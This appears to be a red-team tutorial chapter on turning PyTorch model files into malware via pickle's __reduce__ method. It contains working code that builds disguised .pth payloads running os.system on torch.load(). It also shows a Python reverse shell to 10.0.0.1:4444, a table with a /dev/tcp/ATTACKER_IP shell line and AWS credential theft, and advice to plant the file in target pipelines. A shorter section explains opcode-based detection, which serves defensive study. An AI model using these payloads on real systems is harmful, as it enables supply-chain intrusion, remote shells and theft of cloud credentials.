The convenience of sharing pretrained models introduces a significant security risk. PyTorch's default serialization format is built on Python's pickle module, which is not secure against maliciously crafted files: loading a compromised model file with torch.load() can lead to arbitrary code execution on the victim's machine. This chapter details how such files are crafted and how the exploit is triggered.
The Core Vulnerability: `pickle` and Arbitrary Code Execution
At its heart, this attack vector has little to do with neural networks and everything to do with object serialization. The pickle module can serialize almost any Python object into a byte stream. To reconstruct complex objects, it can be instructed to call arbitrary functions.
The mechanism for this is the __reduce__ magic method. __reduce__ returns a tuple of the form (callable, args), and when an object carrying a custom __reduce__ is unpickled, the pickle machinery calls that callable with those arguments. An attacker can therefore define a class whose __reduce__ points at a dangerous function, pickle an instance of it, and save it as a .pt or .pth file. When a victim runs torch.load() on this file, the payload executes.
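To see the mechanism in isolation, the following sketch uses plain pickle with a deliberately harmless callable (the `Reducible` class and its strings are illustrative, not part of any attack). The callable fires inside pickle.loads(), before the caller ever sees a result:

```python
import pickle

class Reducible:
    def __reduce__(self):
        # (callable, args): pickle.loads() will call str.upper("run at load time")
        return (str.upper, ("run at load time",))

blob = pickle.dumps(Reducible())
result = pickle.loads(blob)  # the callable fires here, during deserialization
print(result)                # RUN AT LOAD TIME
```

Note that loads() does not return a Reducible at all: it returns whatever the callable returned. Substitute os.system for str.upper and "loading" becomes command execution.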
Crafting a Malicious Payload
Creating a weaponized PyTorch file is straightforward. You don’t need a valid model; you only need to create a Python object that executes your desired command during deserialization.
Step 1: Define the Malicious Class
The payload is a simple Python class that uses __reduce__ to point to a dangerous function, such as os.system.
```python
import os
import torch

class MaliciousPayload:
    def __reduce__(self):
        # This method is called during unpickling.
        # It returns a tuple: (callable, (arguments, ...))
        # Here, we instruct pickle to call os.system with a command.
        command = 'echo "Arbitrary Code Execution Successful" > pwned.txt'
        return (os.system, (command,))

# Instantiate the malicious object
payload_instance = MaliciousPayload()
```
Step 2: Serialize with `torch.save()`
Next, you serialize this object using torch.save(), which uses pickle under the hood (modern versions write a zip archive whose data.pkl entry holds the pickle stream). The file extension is typically .pth or .pt so the file passes as a legitimate model checkpoint.
```python
# Serialize the object into a file named like a model checkpoint
torch.save(payload_instance, 'malicious_model.pth')
print("Malicious model file 'malicious_model.pth' created.")
```
The Victim’s Side: Triggering the Exploit
The attack is triggered the moment a user or an MLOps pipeline loads the file with the standard torch.load() function; no further interaction is required. One caveat: PyTorch 2.6 and later default to weights_only=True, which rejects arbitrary pickled objects, so this exploit path relies on an older PyTorch version or on a caller passing weights_only=False (still a common pattern for full-model checkpoints).
```python
import torch
import os

# Victim script - this is all it takes.
print("Attempting to load the model...")

# The payload executes here, during the load operation.
# (On PyTorch 2.6+, this only works if weights_only=False is passed.)
model_data = torch.load('malicious_model.pth')
print("Model loaded.")

# Check if the attack worked
if os.path.exists('pwned.txt'):
    print("Attack successful: 'pwned.txt' file created.")
```
When this script runs, the os.system command from the payload executes during deserialization, before torch.load() even returns. In fact, torch.load() returns whatever the payload's callable returned (here, os.system's integer exit status rather than a model), so the victim's script may crash downstream or continue, but the damage is already done.
Anatomy of the Malicious Pickle Stream
Understanding the pickle bytecode helps in both crafting and detecting these attacks. The serialized stream contains opcodes that instruct the Pickle Virtual Machine. A malicious payload often contains a specific sequence.
The key opcodes to look for are:
- `c` (GLOBAL): imports a module and pushes one of its attributes onto the stack (e.g., `cos\nsystem` resolves to os.system).
- `\x93` (STACK_GLOBAL): the protocol 4+ variant of GLOBAL, which takes the module and attribute names from the stack instead of the stream.
- `R` (REDUCE): pops a callable and an argument tuple off the stack and calls the callable.
Static analysis tools like picklescan operate by scanning the raw byte stream for these dangerous sequences without actually deserializing the file.
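As a rough sketch of that approach (not picklescan's actual implementation), the standard library's pickletools.genops can walk the opcode stream without executing anything. The `Payload` class below is a stand-in for a malicious file, and the blob is only ever dumped, never loaded:

```python
import os
import pickle
import pickletools

class Payload:
    def __reduce__(self):
        return (os.system, ("echo pwned",))  # never loaded in this script

blob = pickle.dumps(Payload())  # dumps() is safe; only loads() executes

# Walk the opcode stream without deserializing it.
opcodes = []
strings = []
for opcode, arg, pos in pickletools.genops(blob):
    opcodes.append(opcode.name)
    if isinstance(arg, str):
        strings.append(arg)

# A GLOBAL/STACK_GLOBAL import followed by REDUCE is the telltale pattern.
print("REDUCE" in opcodes)                                      # True
print(any(op in opcodes for op in ("GLOBAL", "STACK_GLOBAL")))  # True
print("system" in strings)  # the imported callable's name is visible
```

A real scanner would additionally resolve each imported module/attribute pair and check it against a deny list (os.system, subprocess functions, builtins.eval, and so on) rather than flagging every REDUCE.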
Advanced Payloads and Red Team Scenarios
Simple commands are effective for demonstrations, but real-world attacks require more sophisticated payloads. The goal is often persistence, data exfiltration, or lateral movement, not just creating a file.
| Attack Scenario | Payload Example (Conceptual) | Objective |
|---|---|---|
| Reverse Shell | `os.system("bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1")` | Gain interactive shell access to the victim machine. |
| Credential Theft | A Python script that reads `~/.aws/credentials` or environment variables and sends them to a C2 server. | Exfiltrate cloud credentials or other sensitive secrets. |
| Internal Reconnaissance | `os.system("curl -s http://METADATA_IP/...")` | Query cloud metadata services to understand the environment. |
| Persistent Backdoor | A script that downloads and executes a second-stage payload, then adds itself to cron or a startup service. | Maintain long-term access to the compromised system. |
Example: Reverse Shell Payload
A reverse shell is a common objective. The payload connects back to an attacker-controlled machine, providing shell access. The following demonstrates how to embed this into the __reduce__ method.
```python
import os
import torch

class ReverseShellPayload:
    def __reduce__(self):
        attacker_ip = '10.0.0.1'  # Attacker's listening IP
        attacker_port = 4444      # Attacker's listening port

        # One-liner run on the victim: connect back, wire stdin/stdout/stderr
        # to the socket, and spawn an interactive shell.
        cmd = (
            "python3 -c 'import socket,os,pty;"
            f's=socket.socket();s.connect(("{attacker_ip}",{attacker_port}));'
            "[os.dup2(s.fileno(),f)for f in(0,1,2)];"
            'pty.spawn("/bin/bash")\''
        )
        # __reduce__ only supports positional arguments, so keyword-dependent
        # calls like subprocess.run(cmd, shell=True) won't work; os.system does.
        return (os.system, (cmd,))

# Save the payload
torch.save(ReverseShellPayload(), 'reverse_shell_model.pth')
print("Reverse shell payload created.")
```
As a red teamer, your task is to place this reverse_shell_model.pth file where a target’s automated pipeline or a developer will load it. This is the essence of a supply chain attack: poison the artifact, then wait for it to be consumed.